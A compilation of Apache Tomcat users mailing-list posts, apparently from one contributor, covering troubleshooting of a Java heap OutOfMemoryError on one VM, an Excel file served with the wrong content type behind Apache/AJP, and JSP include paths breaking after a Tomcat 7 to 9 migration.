behaving differently? What else should I be looking for?


Earlier you said "comparable" and now you're saying "identical". So I 
have to ask ... which is it?  Remember that differences in 
configurations, types of requests, and request load can lead to very 
different requirements, even if the apps running inside Tomcat are the 
same.


Most of my experience in the Java world comes from Solr.  Apache Solr 
is a servlet application, and ships with Jetty.  Tomcat is not usually 
involved.  I joined this mailing list because I was responsible for 
Tomcat servers running apps developed in-house, and every once in a 
while, I needed to ask something tomcat-specific.


Thanks,
Shawn

-
To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org
For additional commands, e-mail: users-h...@tomcat.apache.org




-
To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org
For additional commands, e-mail: users-h...@tomcat.apache.org

Out of memory exception

[Niranjan Rao]

Greetings,


First apologies for non tomcat question. I have seen that there is 
enough expertise here to provide hints and hints are what I am looking 
for to solve the problem and question is generic enough. I have tried 
researching problem to best of my abilities.


It all happens on Ubuntu 20.04 and JDK 15

We have a java program that regularly throws 
"java.lang.OutOfMemoryError: Java heap space" exception. Puzzling point 
is it happens only on one VM. We have a set of two VMs/boxes spawned 
from same AWS image. Machine class/region is exactly same and since they 
are from same image, they should be mostly identical except stuff like 
host name, ip address etc.


Number of tasks performed by VMs are comparable and not a significant 
difference. Yet, one VM never runs of out of memory and other one does. 
Sometimes it's as soon as half an hour after restarting the process 
while on the other box process is running for days and no issues.


I took memory dumps from both VMs and they look similar. Program is 
started with -Xmx1g flag and we have taken regular memory dumps. In many 
cases eclipse MAT reports total memory usage was less than 100MB when 
program crashed with out of memory exception.



Has anyone seen anything similar to this? Identical bits of code 
behaving differently? What else should I be looking for?



Regards,


Niranjan


-
To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org
For additional commands, e-mail: users-h...@tomcat.apache.org

Re: Tomcat server not considering Mime Type - Request urgent help!!

[Niranjan Rao]

What everyone is telling you is browser is not seeing right headers..

You can modify your tomcat settings as well as apache2 settings to log 
outgoing content type header. If tomcat and apache2 headers match, 
problem is in your tomcat side. If there is a mismatch and tomcat is 
sending right headers. then problem is on apache2 side. You can directly 
connect to tomact using curl or even in the browser to bypass apache2 
and see if it works.


How is response returned? How do you set the extension of the file? You 
said file generated dynamically, are you sure your servlet or whatever 
service handler you have there is not sending incorrect header?


I am not sure, but I believe global mime type settings are only for 
static files that tomcat serves. Any dynamically generated content has 
to be managed by response handler. More knowledgeable people here can 
correct me if I am wrong.


Regards,

Niranjan

On 1/14/21 8:59 AM, Jonnalagadda, Swathi (External) wrote:

Could you please elaborate more on this as to where I need to check

From: Mounika Reddy 
Sent: Thursday, January 14, 2021 2:41 AM
To: Tomcat Users List 
Cc: Mark Thomas 
Subject: Re: Tomcat server not considering Mime Type - Request urgent help!!

CAUTION:   This email originated from outside the organization. Do not click 
links or open attachments unless you recognize the sender and know the content 
is safe.

If you are via AJP connector, then check if Apache proxy is changing
headers. We have a similar environment and when we set content-type,
clients see the same but possible it must be overriding

On Wed, Jan 13, 2021, 3:14 PM Jonnalagadda, Swathi (External) <
swathi.jonnalaga...@xerox.com> wrote:


This issue is not resolved yet.  The extension of file is clearly .xls but
I see content-type in response header is set to text/html.

Please note that the request initially hits apache2.4 server which is
redirected to tomcat9 server after successful authentication at siteminder.

The connection is configured via ajp connector.

Is there a possibility that the apache server is overwriting the
content-type header in response ?

Please advise.

Thanks
Swathi

-Original Message-
From: Jonnalagadda, Swathi (External) [mailto:
swathi.jonnalaga...@xerox.com]
Sent: Wednesday, January 13, 2021 1:57 PM
To: Tomcat Users List
Cc: Mark Thomas
Subject: RE: Tomcat server not considering Mime Type - Request urgent
help!!

CAUTION:   This email originated from outside the organization. Do not
click links or open attachments unless you recognize the sender and know
the content is safe.

Thank you for the email

We could see that when we try to open the xls file separately the browser
shows dialogue box to save it so it is nothing to do with browser settings

Could you please advise if I am missing out any setting here.

Thanks
Swathi
-Original Message-
From: Mounika Reddy [mailto:spidermai...@gmail.com]
Sent: Wednesday, January 13, 2021 3:48 AM
To: Tomcat Users List
Cc: Mark Thomas
Subject: Re: Tomcat server not considering Mime Type - Request urgent
help!!

CAUTION:   This email originated from outside the organization. Do not
click links or open attachments unless you recognize the sender and know
the content is safe.

Pls check http response headers for the request to confirm if it's
returning proper headers.

Once they are in place then it may be to do with browser settings not
processing headers.



On Tue, Jan 12, 2021, 2:48 PM Jonnalagadda, Swathi (External) <
swathi.jonnalaga...@xerox.com> wrote:


Hi Team

We have an application deployed in tomcat9.0.38 server which generates
an xls file dynamically and saves at server end. When we try to access
the file using application frontend, it is neither showing up in excel
format nor showing up pop up to save the file instead it is showing
the content of xls file in xml format directly on the browser.

Below mime type is set both at web.xml of webapplicatio end and as
well as Tomcat9038/conf/web.xml


 xls
 application/vnd.ms-excel
 

Could you please help in resolving the issue ASAP


Thanks
Swathi




-
To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org
For additional commands, e-mail: users-h...@tomcat.apache.org

Re: Version migration problems

[Niranjan Rao]

Hi Mark/Chris,

Thank you for the reply.

It's a spring application, related controllers/methods basically return 
page name as return "pages/Login".


The view resolver maps it WEB-INF/jsp/pages/Login.jsp.

Login.jsp has entry that says



This entry gets resolved correctly in V7, but V9 I get error can not 
find pages/jsp/fragments/commonData.jsp.


After playing with it couple of hours, I figured out full path works. So 
issue seems to be root context/directory of jsp engine that was WEB-INF 
seems to have changed to current directory where page is getting loaded.

JSP generation still generates same line for both of them like following.

org.apache.jasper.runtime.JspRuntimeLibrary.include(request, response, 
"jsp/fragments/commonData.jsp", out, false);


But v9 interprets it relative to directory of current jsp that is in my 
case WEB-INF/jsp/pages and older engine interprets it relative to 
WEB-INF directory.


JDK version 1.8.0_111, Operating system is 16.04.6. It's same WAR file 
getting deployed in both tomcat versions. Only difference is server.xml 
has different ports.


Regards,

Niranjan
On 6/19/20 6:13 AM, Mark Thomas wrote:

On 19/06/2020 13:19, Christopher Schultz wrote:

Niranjan,

On 6/18/20 13:47, Niranjan Rao wrote:

I am trying to migrate from 7.0.73 to 9.0.36 and facing
challenges.
Java version and operating system version remains same in both
cases.

... and what are those versions?


I have carefully reviewed the configurations and everything looks
ok. Version 9 does not report any problems when starting the
application either in catalina.out file or in the application log
file.

Good.


Applications has bunch of JSP pages which sit under
WEB-INF/jsp/pages directory and some of these pages include
fragments from WEB-INF/jsp/fragments directory. In the older
version V7 this works correctly, but in V9 I get error about
include not not found. Page do get resolved correctly, but includes
do not.

Can you give some examples?

+1. The simplest test case that demonstrates the issue would be good.
That should be a JSP, a JSP fragment and the appropriate directory
structure.

Mark


Given only change is tomcat version as it's same WAR file deployed
on same operating system and same java version, I am thinking I am
missing some basic change in tomcat JSP lookup for version 9.



Can anyone please point me what I can be doing wrong or what I need
to do so that same WAR file works in both versions

-chris


-
To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org
For additional commands, e-mail: users-h...@tomcat.apache.org



-
To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org
For additional commands, e-mail: users-h...@tomcat.apache.org




-
To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org
For additional commands, e-mail: users-h...@tomcat.apache.org

Version migration problems

[Niranjan Rao]

Greetings,


I am trying to migrate from 7.0.73 to 9.0.36 and facing challenges.


Java version and operating system version remains same in both cases.


I have carefully reviewed the configurations and everything looks ok. 
Version 9 does not report any problems when starting the application 
either in catalina.out file or in the application log file.



Applications has bunch of JSP pages which sit under WEB-INF/jsp/pages 
directory and some of these pages include fragments from 
WEB-INF/jsp/fragments directory. In the older version V7 this works 
correctly, but in V9 I get error about include not not found. Page do 
get resolved correctly, but includes do not.



Given only change is tomcat version as it's same WAR file deployed on 
same operating system and same java version, I am thinking I am missing 
some basic change in tomcat JSP lookup for version 9.



Can anyone please point me what I can be doing wrong or what I need to 
do so that same WAR file works in both versions



Regards,

Niranjan


-
To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org
For additional commands, e-mail: users-h...@tomcat.apache.org